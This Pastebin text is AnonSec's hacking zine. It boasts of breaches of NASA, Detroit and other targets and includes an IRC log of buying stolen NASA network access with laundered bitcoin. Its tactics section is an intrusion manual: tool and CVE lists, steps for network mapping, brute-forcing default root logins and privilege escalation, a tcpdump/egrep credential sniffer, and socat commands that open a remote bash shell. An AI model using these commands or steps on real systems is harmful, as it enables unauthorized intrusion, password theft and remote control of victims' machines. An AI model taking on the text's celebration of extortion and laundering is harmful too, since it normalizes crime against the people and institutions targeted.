Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -----BEGIN PGP SIGNED MESSAGE-----
- Hash: SHA1
- Version: OpNasaDrones
- pub 4096R/4AAE63E0 2015-10-01
- Key fingerprint = DEFD 83DD 81B5 A61D 9959 C009 4CFF 6773 4AAE 63E0
- uid AnonSec (Nihil Verum Est Omnia Licita) <An0nsec@protonmail.ch>
- .8. b. 8 ,o888888o. b. 8 d888888o. 8 8888888888 ,o888888o.
- .888. 888o. 8 . 8888 `88. 888o. 8 .`8888:' `88. 8 8888 8888 `88.
- :88888. Y88888o. 8 ,8 8888 `8b Y88888o. 8 8.`8888. Y8 8 8888 ,8 8888 `8.
- . `88888. .`Y888888o. 8 88 8888 `8b .`Y888888o. 8 `8.`8888. 8 8888 88 8888
- .8. `88888. 8o. `Y888888o. 8 88 8888 88 8o. `Y888888o. 8 `8.`8888. 8 888888888888 88 8888
- .8`8. `88888. 8`Y8o. `Y88888o8 88 8888 88 8`Y8o. `Y88888o8 `8.`8888. 8 8888 88 8888
- .8' `8. `88888. 8 `Y8o. `Y8888 88 8888 ,8P 8 `Y8o. `Y8888 `8.`8888. 8 8888 88 8888
- .8' `8. `88888. 8 `Y8o. `Y8 `8 8888 ,8P 8 `Y8o. `Y8 8b `8.`8888. 8 8888 `8 8888 .8'
- .888888888. `88888. 8 `Y8o.` ` 8888 ,88' 8 `Y8o.` `8b. ;8.`8888 8 8888 8888 ,88'
- .8' `8. `88888. 8 `Yo `8888888P' 8 `Yo `Y8888P ,88P' 8 888888888888 `8888888P'
- 4c 61 75 67 68 69 6e 67 41 74 59 6f 75 72 53 65 63 75 72 69 74 79 53 69 6e 63 65 32 30 31 32
- ` ```
- ``` ... ```` `` ``--` ``
- ``. .--. ..``-.-.` `..````.:. .-.. ```
- ` ---```.`.` -..` `.`- `..:. ` --` `
- .-- `---` ``.. `...` `.-.` .--
- `.``.:.`` ````` ... ```.-- `-.
- ` .--`````.` ....``` --. `
- ``. ....``` ` ``````.`````-`` `` `````....` .``
- ` .-.```.```. ```..---....`.-----``.-.. ` ``...```... `
- `.``.`-.``` ..-.`..:`.--..-::.-.`...`-.-` . .:..-. .`
- .--.`` .-.` `.--.`-.....---..`----.--`--`---.`` `.-` ``.`-`
- ` `.`.---.` `-.--...-.-.-...`.-`..--.`...-.-..:... `.```--.```
- `-.````... `...`.`.--``-..........-...-.`.......`.. `...`` .`
- `-..````` ```..```.--...`...--....-`..--..`.-......` ```. `.``
- .``-....`` ..`.. ...----`........--....-..`.---.---. `.`.``.````
- ..-```..` `-.-. ``-....-:.-.``..-.........-.....--.. ...````-.
- `---..---. `--` ./.---..`--......--:---`---.-..-.---. -::----..
- `. `.`--. `:-. `.-..-.`.---:----..- ---::----..-..-: `- ..`` ..
- .--```.`.` `--` ---.``` `..:...-.-` ` `--.--..`-. `:.````.--
- .-....-.`` `-.. ..-. ``..`..-` ``---`.`.` .--......
- ```...--`` ..` .`.. `-...:- --.``..` ....-...``
- ..` `` .` `-. ..- .-..`--` .-.``-.. .` ` `.
- ..`..---. `--- .``.-...-` ..: . .--.`..`.-
- ``.`.--` ``.`.-` `-..-. `---.`` `.--.` .``..``
- .` `` `--. ..`.-.------:-`-..- .--.-..-..`-:----.- `.` `-:
- `..`.`.-.` .:..-``....--:--. ......-.--..-.`--. .-.``..`.`
- `.......``` ```-:.-....`...` `.` .--..`....-..-. ```..`.. .`
- `.`````.. ..``..``.--.`...``-.`-..--.`.``` -- `````
- ---.``--.. `....-..-:.-....`-..---` :-````.:--
- `----::`.` ` .` `--.--.....---.-``.. ``/-.---.-
- ```. `--. ---. `...-..---..``` --- ---``` ```
- ..-..`.---`` .-... .. .``.`.. -` `-`-- --`.``-...`
- `.-..-...`.-` ....-. ` ` ` .--:` ````.-.--...`
- `.....`` .-` ..--` `.-..` `.`.```...```
- ``` ```.``` ...-.` ` ` `` ` `...`. ` `.....` ``
- .--..-.--` --` ....-``` ```.` .`` `-..`` ... `-..`` .`
- `..` ```.`.` .` ...--:--.`.....`....... ` `--.``. .--`
- .......`..` -.. ..`-........-----`-` ..-` --.``.`--.`
- ``..-``.````-`.` ..` `.--....`.-``-` ``. `...`````.....``
- ``````````...` ... ` ` ```````` ` ``` ``... ``..``` ``````
- ..````-..` `..`. ..`` ``.--`.---. `.``--.-`
- .``.-.` ```--:. ..`-. -..-` .:-.``` `.--`.`
- `.:- .--`` `-.-. `-.````.-.. .-.`
- ``-`--. `..-..` ```` ```.``-.`..` .`-::-`
- ```-..---`` ` `````` ` ``.--..`.` ```
- `````..` `` ` ``.`` ``
- #AnonSec
- /dev/null before dishonour
- + o + o
- BEWARE +------------------------------------+ + o + +
- OF | Table of Contents | o +
- RANTS, |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| o + + +
- | 0x00 - Preface | + o o + o
- RICKTROLLING | 0x01 - FLASH FROM THE PAST | -_-_-_-_-_-_-_,------, o
- | 0x02 - TTP(Tech/Tac/Pro) | _-_-_-_-_-_-_-| /\_/\
- AND | 0x03 - NASA Missions&Aircraft | -_-_-_-_-_-_-~|__( ^ .^) + +
- | 0x04 - Chemtrails/CS/GE/WM | _-_-_-_-_-_-_-"" ""
- ROOTKITS | 0x05 - WHATS A ROOTKIT? | + o + +
- | 0x06 - Russian Roulette | + o o + o
- | 0x07 - Epilogue | + +
- +------------------------------------+ o o o o +
- > 0x00 - Preface
- "Look, the people you are after are the people you depend on. We cook your meals,
- we haul your trash, we connect your calls, we drive your ambulances. We guard you
- while you sleep. DO NOT... FUCK WITH US."
- Well here we are, its 2015/2016 and shit has gotten weird... like "No more secrets Marty" weird.
- But if there is one thing our team has learned over the past years, its that no one has
- impermeable OpSec, not even the NSA or GCHQ, e.g. Snowden leaks, ICWATCH, NSA Playset, etc...
- Basically, people will ALWAYS be the biggest vulnerability in any networked system.
- With that being said, we want to take the time to thank all baby boomer secretaries
- world-wide, without your lack of training and irresistible urge to open attachments in
- spoofed emails from the HR department, this would have never happened lol // Gozi ftw ᕙ༼ ,,ԾܫԾ,, ༽ᕗ
- +==================================================================================+
- .-------.
- .' `.
- .' `.
- | NO SKIDS |
- | ALLOWED |
- | BEYOND |
- ' THIS '
- `. POINT .'
- `._______.' __ __
- | | .----/ \ / \---.
- | | | | | | |____
- | | | |`--''`--'| / | \_
- ,----.| \~O~| ~O~ _ | | | \
- | ---'| '._/ \_.| `| | | |
- \.---'| | | `- ,| |
- `---'| | : |
- | | | | '._.-- ;
- | | | . .: ` /
- '-' | '....' `.______/
- | |
- | |
- `----------------'
- || ||
- || ||
- _.---'' '-, ,-' ''---._
- / __..' '..__ \
- '---''` `''---'
- For those who dont know us, AnonSec was created in Nov 2011 by MrLele(a former AnonGhost admin,
- now Peshmerga sniper) and AnonSec666(US python programmer). Since our start with two members from
- Kurdistan and USA; we have come a long way; adding members and associates from the UK, Germany,
- Japan, Malaysia, Morocco, Indonesia, India, Pakistan, Iraq, Italy, Romania and even Latvia. //shouts to CWA, LizardSquad & TeaMp0isoN || rip alg0d
- Here are just a few Operations we either started or were heavily involved in...
- ==> #OpNasaDrones == hacked NASA's drone servers and ex-filtrated missions data; vid/data logs [possibly prove existence of Chemtrails and their global warming effect(also their bad OpSec of course)]
- e.g. - http://anonhq.com/anonsec-hacked-drone/
- - https://www.cyberguerrilla.org/blog/anonymous-operation-nasa-drones-anonsec/
- - http://cyberwarzone.com/anonsec-hackers-claim-hacked-nasa-drones/
- ==> #OpBeast/OpNullDenmark == after DDoSing, defacing or rm -rf / 100's of beastiality sites, Denmark finally changed their laws
- - http://www.mirror.co.uk/news/technology-science/technology/anti-bestiality-hackers-target-vile-dog-5310038
- - http://www.techworm.net/2015/04/anonymous-launch-opbeast-against-animal-cruelty-and-depravity.html
- - http://www.bbc.co.uk/newsbeat/article/32411241/denmark-passes-law-to-ban-bestiality
- ==> #OpDetroit == DDoS servers over Detroit water shutoffs also seized a Detroit govt DB and demanded BTC ransom
- - http://www.rt.com/usa/206663-detroit-bitcoin-ransom-database/ // they never mentioned AnonSec even tho a member was v& over it *sigh*
- - http://www.techworm.net/2014/11/hackers-encrypted-entire-city-detroit-database-demanded-ransom-2000-bitcoins-803500.html
- - http://pastebin.com/raw.php?i=fc5s029B
- - http://www.usatoday.com/story/news/nation/2014/08/04/detroit-water-shutoffs/13584027/ // Detroit suspended water shutoffs until August 25th, 1 day after we demanded
- ==> #OpIsrael == once a year we join in the chaos of fucking raping Israeli cyberspace in protest of the current apartheid #FreePalestine
- - https://en.wikipedia.org/wiki/OpIsrael
- - https://www.rt.com/news/opisrael-anonymous-final-warning-448/
- - https://www.rt.com/news/anonymous-israel-cyber-attack-737/
- - https://www.youtube.com/watch?v=Uxy57ofajwE
- - https://www.youtube.com/watch?v=uskOcl0OHwY
- - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/anonsec-allegedly-hacks-israel-defense-forces-military-preparatory-school-in-support-of-palestine.html
- ==> #OpISIS/#OpTerror4ISIS == worked with GhostSec to take down thousands of ISIS twitter accs, websites and forums
- - http://www.techworm.net/2015/04/opisis-anonymous-release-list-of-70-pro-isis-websites-and-14000-of-twitter-ids.html
- - http://cyberwarzone.com/anonsec-declares-war-isis-opterror4isis/
- - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/site-1-20-15-anonsec-announces-operation-terror-4-isis-releases-terrorist-group-government-target-list.html
- ==> #OpDeathEaters == Expose a UK Paedophilia network being protected by the political elite
- - http://www.telegraph.co.uk/news/worldnews/northamerica/usa/11363303/Anonymous-hackers-turn-fire-on-global-paedophile-menace.html
- - http://www.dailydot.com/politics/operation-death-eaters-opdeatheaters-anonymous-pedosadism-prince-andrew/
- - http://www.ibtimes.co.uk/opdeatheaters-anonymous-marches-planned-across-uk-us-highlight-global-network-child-abusers-1487867
- ==> After hacking the Windsor University School of Medicine & leaking DBs, we deleted +$9,000,000 in student loan debt instead of phishing students ^_^
- - https://ent.siteintelgroup.com/Dark-Web-and-Cyber-Security/windsor-university-school-of-medicine-allegedly-hacked-student-database-leaked.html
- - https://twitter.com/_d3f4ult/status/651290005793472512
- ==> And tons of others that were rekt for various reasons
- - https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&tagId=658&Itemid=1355
- - https://twitter.com/search?q=%40VaraCyber%20Anonsec&src=typd
- - http://belsec.skynetblogs.be/archive/2014/11/04/70-000-bitcoin-access-accounts-hacked-at-btc-e-com-and-sold-8318769.html
- - http://www.bitdefender.com/security/anonsec-hacking-group-breaches-720-random-sites-worldwide;-mocks-lax-security.html
- - http://thecryptosphere.com/2014/10/08/anonsec-hackers-tangodown-turkish-e-commerce-sites/
- - http://www.eduicon.com/News/Details/3485.html
- - http://www.tech.com.pk/2014/01/720-websites-hacked-and-defaced-by.html
- - http://www.meethackers.com/2014/04/mcdonalds-id-leaked-by-anonsec-hackers.html
- - http://pastebin.com/qYUeCzNJ
- - http://pancasilacyberteam.blogspot.sg/2014/04/1381-email-dibocorkan-oleh-anonsec-dan.html
- - http://www.wired.com/2015/11/cia-email-hackers-return-with-major-law-enforcement-breach/
- - http://zone-h.org/archive/notifier=AnonSec
- Since our inception we have certainly had our 'ups&downs' as you could say, from a core member
- getting v&, @MrLele1337 going afk to fight ISIS irl and some even becoming whitehats at tech
- companies(Pr3dat0r). However, we are still here laughing at 'security', exposing feds online
- & fucking everyones databases... long dick style (•_•) ( •_•)>⌐■-■ (⌐■_■)
- On a more serious note, this is AnonSec's very first zine!
- So grab some popcorn and lets get this blood orgy started...
- ____________________________________________________
- / \
- | _____________________________________________ |
- | | | |
- | | | |
- | | root@onion.land:~# irssi | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | | | |
- | |_____________________________________________| |
- | |
- \_____________________________________________________/
- \_______________________________________/
- _______________________________________________
- _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
- _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
- _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
- _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
- _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
- :-----------------------------------------------------------------------------:
- `---._.-----------------------------------------------------------------._.---'
- +==================================================================================+
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- +==================================================================================+
- > 0x01 - FLASH FROM THE PAST
- Lets take time to appreciate how this all started 2 years ago...
- ° ☾ ☆ ¸. ¸ ★ :. . • ○ ° ★ . . . ¸ . ° ¸. * ● ¸ .
- ...Long ago ° ☾ ° ¸. ● ¸ . ★ ° :. . • ° . * :.
- • ○ ° ★.in an IRC far, ● ¸ ° ☾ °☆ . * ¸. ★ ★ ° . .
- . . ☾ °☆ . * ● far away.......° ☾ ★ °● ¸ . ° ¸. * ●
- . ★ ° :. . • ○ ° ★. . ¸ . ★ ★ ° . . ☾ °☆. ° ¸.
- $# /join #64616e74657320696e6665726e6f 4c696d626f
- (3:24) == Shimo7even [root@onion.land] has joined #64616e74657320696e6665726e6f
- (3:24) -REDACTED- : Finally....
- (3:24) * -REDACTED- glares at Shimo7even for being late
- (3:25) Shimo7even : br00te told me DA willing to sell access?
- (3:25) 鬼佬 : yes, NASA still
- (3:26) -REDACTED- : Nothing interesting on this server but it would serve as a good foothold in the network
- (3:27) Shimo7even : im listening
- (3:27) 鬼佬 : we held several nets for Miami before v&
- (3:27) 鬼佬 : we injected our own malware
- (3:28) -REDACTED- : pareizs
- (3:29) 鬼佬 : we have no idea who else they gave access to
- (3:29) 鬼佬 : did +10,000 bot kills just to be safe
- (3:29) pangeran : hhhhhhhhhhhhh itu lucu XD XD
- (3:30) Bashtien : so how much you guys want?
- (3:30) 鬼佬 : -REDACTED-
- (3:31) -REDACTED- : So, still think you can afford our services?
- (3:31) pangeran : ^^^^^^ hhhhhhhhhhhhhhhhhhh ^^^^^
- (3:31) Shimo7even : Afford? That's rich
- (3:32) Shimo7even : LoLing@You -REDACTED-
- (3:33) Sh1n0d4 : play nice..
- (3:34) Bashtien : -REDACTED- we have been sitting on a ton BTC-E accs for a while now..
- (3:34) Bashtien : so crypto funds are no problem m8
- (3:35) хуй : ^^
- (3:35) d3f4ult : We will even tumble the coins multiple times, so they are 100% clean
- (3:35) TGab : Those poor Cossaks, ha
- (3:37) Shimo7even : BTC or LTC?
- (3:37) 鬼佬 : btc
- (3:38) 鬼佬 : https://anonfiles.com/file/-REDACTED-REDACTED-REDACTED-REDACTED-
- (3:39) Bashtien : cant read the url in the screenshot..
- (3:41) -REDACTED- : thats a decoy.. open it in a hex editor, there is a url to a zip containing a txt file with the real backdoor url
- (3:41) Sh1n0d4 : that OpSec though lol
- (3:43) * TGab crunches popcorn
- (3:45) Bashtien : pass?
- (3:45) 鬼佬 : 547265616368657279 for both the zip and shell
- (3:46) d3f4ult : fuhosin ^_^
- (3:49) * Bastien starts a slow clap
- (3:50) * TGab drops popcorn all over the floor
- (3:50) d3f4ult : Awww, was hoping it was rooted :(
- (3:50) -REDACTED- : No but we fingerprinted many outdated systems in the network
- (3:51) pangeran : wkwkwkwkwkwkw!!! DA ftw \(^_^)/
- (3:51) Sh1n0d4 : well thats good enough for me, wbu shimo?
- (3:53) Shimo7even : !sendbtc -REDACTED- -REDACTED-REDACTED-REDACTED-REDACTED-
- (3:53) Sh1n0d4 : Well thats a yes haha
- (3:53) == ゴールド [~ゴールド@co.in] has joined #64616e74657320696e6665726e6f
- (3:53) ゴールド : https://blockchain.info/address/-REDACTED-REDACTED-REDACTED-REDACTED-
- (3:54) ゴールド : 送信
- (3:55) == ゴールド [~ゴールド@co.in] has quit [Client Quit]
- (3:55) -REDACTED- : Pleasure doing business, until next time.
- (3:55) 鬼佬 : 谢谢 :)
- (3:56) == 鬼佬 [龙@58.87.127.147] has quit [Client Quit]
- [>Disclaimer: Certain information was -REDACTED- due to privacy concerns or by request.]
- +==================================================================================+
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~NEXT CHAPTER~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
- +==================================================================================+
- ~~~==+ THE WORLD IS CORRUPT, DONT BE SHEEP TO THE SLAUGHTER +==~~~
- SURVIVE | CONTEMPLATE | INNOVATE
- > 0x02 - TTP(Techniques, Tactics & Procedures)
- So yeah, we know what you're thinking, hacking NASA? How fucking cliche...
- If only I had a Dogecoin for everytime someone claimed that, amiright?
- Its like the boy who cried wolf but with hacking NASA instead lol
- But you might be surprised how low govt security standards can be, especially with a limited
- budget and clueless boomers controlling the network. NASA has been breached more times than
- most people can honestly remember (our favorites were Gary McKinnon && Mendax's milw0rm)
- // you know, when people used to have legit reasons for their hacks^^
- Reasons from searching for hidden evidence of UFO technology to protesting use of Uranium based rocket fuel ^_^
- "What the Fuck gives you freedom,
- freedom brings opportunity,
- opportunity makes your future"
- However, this hack into NASA wasnt initially focused on drones data and upper atmosphere chemical samples.
- In fact the original breach into NASA systems wasnt even planned, it was caught up in a gozi virus spread.
- After purchasing our initial foothold, we were just seeing how many machines we could break into, root
- and possibly find interesting/profitable data. So Bashtien contacted Dr.d3v1l, an italian hacker who recently
- hacked and defaced several NASA subdomains. They provided much insight into common CMS's NASA uses as
- well as potential weak spots in their networks.
- Since our first shell in NASA systems just had user acc priv, we were fairly limited as to not only what
- dirs we could access, the commands we could run and the other machine/devices on the network that should have
- been visible. Getting root access on this box would be ideal, so that what we went for.
- Unfortunately, this box was running the latest version of debian and didnt have any local root CVEs(publicly)
- and we failed to spear phish the root passwd... luckily MA saved the day with his 2014 bypasses & symlink exploits.
- With this we were able to simulate root in a new linux directory and run any command. This allowed us to move tools/utils/modules
- (get-pip.py/eggs)/0days to the box as needed[see scp_tools.txt]. scp_tools.txt contains a list of some TTP that were
- used to accomplish these hacks, its best to make a couple shell scripts for much quicker downloads(scp_tools.sh).
- >cat scp_tools.txt
- ~ Map Network ~
- nast -m
- reverse-ip lookups
- whois & reverse-whois
- dirbuster
- [MapNet]
- ~ Scan Ports/Fingerprint/Enumerate ~
- unicornscan && onetwopunch.sh
- Nmap NSE - NFS - SMB
- LinEnum.sh
- linuxprivchecker.py
- fierce.pl
- Bluto
- dnswalk
- Network Miner
- ~ Vuln Scanner ~
- Linux_Exploit_Suggester.pl
- unix-privesc-check
- nikto.pl
- wpscan.rb
- joomscan.pl
- uniscan
- wapiti
- w3af
- nipper
- ~ Bruteforce ~
- hydra w/ passwd lists
- ~ 0days ~
- Mauritania Attackers 2014 bypasses & r00t Symlink Exploits
- CVE-2013-5065
- CVE-2014-0038
- WD My Book World Edition SSH root remote enable
- ~ Packet Capture/Sniffers/Recovery ~
- wireshark
- tcpdump
- dsniff
- mimikatz
- egrep
- // special thanks to Mauritania Attacker for his bypasses & symlink exploit ^_^
- "Assume every network you're on is malicious"
- - Samy Kamar
- *Mapping a network can be accomplished a million different ways, depending on the type of box your foothold is.
- By that we mean; what OS is it, what utils and dependencies does it have already installed, what privileges do
- you have, is there any IP restrictions? Once we had a symlinked r00t directory filled with tools is when the
- real fun began... we started mapping their network.
- +=========================================================================+
- | Our General Steps for Mapping & Propagating Laterally Through a Network |
- +=========================================================================+
- 1) Once we had access to a box in the network..
- [MapNet] Here are just a few simple commands to scan active nodes within a network:
- arp
- nast -m
- ip neigh
- AngryIpScanner (has GUI)
- arp-scan -l -I eth0
- ping -b 192.168.1.255
- smbtree -NS 2>/dev/null
- nbtscan 192.168.1.1-255
- fping -a -g 192.168.1.0/24 2> /dev/null
- nmap -sP 192.168.1.0/24 or nmap -sn 192.168.1.0/24
- for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done
- 2) Next to get a broader view of their entire network, we started probing whois and reverse-whois lookups on the ip
- addresses and domain names we found, as well as registrars info(ex. "222 S Mill Avenue" inurl:domaintools). Also
- running Bluto & fierce.pl to find ip leaks via DNS zone transfers. If scans are fruitful with new hosts found, repeat
- steps 1&2 on the new addresses. Do this until you cant find any more hosts.
- 3) Once we started seeing other connected nodes on the same LAN, it was time to run some port scans and do some
- passive OS/BIOS fingerprinting. (unicornscan && onetwopunch.sh or nmap NSE scripts come in handy here)
- 4) After mapping some nodes, scanning ports and fingerprinting; we started looking up CVE's for the different versions
- of operating systems and the various services running.(Linux_Exploit_Suggester.pl, unix-privesc-check, nikto.pl,
- uniscan and CobaltStrike are the best for automating this process)
- 5) Any system running RDP/VNC/SSH/MYSQL should always be bruteforced because its common for administrators to either
- leave the default login or to use an extremely common passwd.
- > ALWAYS -e nsr WHEN BRUTEFORCING <
- +-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
- |I|n| |C|o|m|m|o|n|l|y| |u|s|e|d| |P|a|s|s|w|o|r|d|s| |W|e| |T|r|u|s|t|
- +-+-+ +-+-+-+-+-+-+-+-+ +-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+ +-+-+-+-+-+
- [22][ssh] login: root password: root
- 1 of 1 target successfully completed, 1 valid password found in 0.32s
- 6)* If the site is being used as a public server or for any type of database storage, it will most likely have a
- CMS(content management system) with a cpanel. So try running cmsmap.py, wpscan.rb or joomscan.pl.
- 7)* If the server has any kind of web application on it, try running wapiti and w3af.
- 8)* If there are any firewalls, switches or routers found in the network, try running nipper(SonicWALL lol).
- 9) Scanners are great for those of us who are either busy or lazy, but they also tend to generate alot of false positive results. One of the most important steps is to use something like dirbuster and manually browse various .xml, .js, .php and php.in files source for SQLi,
- XSS, LFI, RFI, FPD, HostHeaderAttacks etc[this requires decent programming and exploitation knowledge to spot possible configuration errors,insecure functions or unsanitized inputs i.e _SERVER["HTTP_HOST"] ], unserialize(), popen() , strcmp(), exec(), system(), shell_exec(), escapeshellcmd(), passthru(), create_function(), pcntl_exec(), eval() & many many more!
- Here is an example of NASA SQLi and XSS vulnerabilities:
- SQLi: http://prntscr.com/9hekve
- XSS: http://prntscr.com/9kkc8r && http://prntscr.com/9kkcnf
- 10)* If that comes up with nothing then its either brute forcing a login, spear phishing a login with XSS or SEing a login or passwd reset. (hacked VPSs/RDPs, proxies, hydra+wordlists && some burner sims/phones or VoiP servers or hacked Skype accs are a definite must have for this)
- 11) Always target the most vulnerable nodes first(minus false positives). //They have many WinXP & unpatched Ubuntu servers btw
- - WinXP Local SYSTEM privilege escalation: CVE-2013-5065
- - Ubuntu Local root exploit: CVE-2014-0038
- 12) Everytime we gained access to a new box we always left a packet sniffer running to hopefully get some http/ftp/smtp/imap/pop3 logins:
- tcpdump -i eth0 port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=||name=|name:|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
- ngrep -q -W byline "GET|POST HTTP"
- dsniff -m
- \!/ ALWaYS RUN SC4NS oN N3W BOXes FOR MORE NoDES \!/
- 13) Pivoting is great for all kinds of things like bypassing firewalls & getting reverse shells w/ statically linked copy of socat to drop on target:
- target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM
- host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM
Add Comment
Please, Sign In to add comment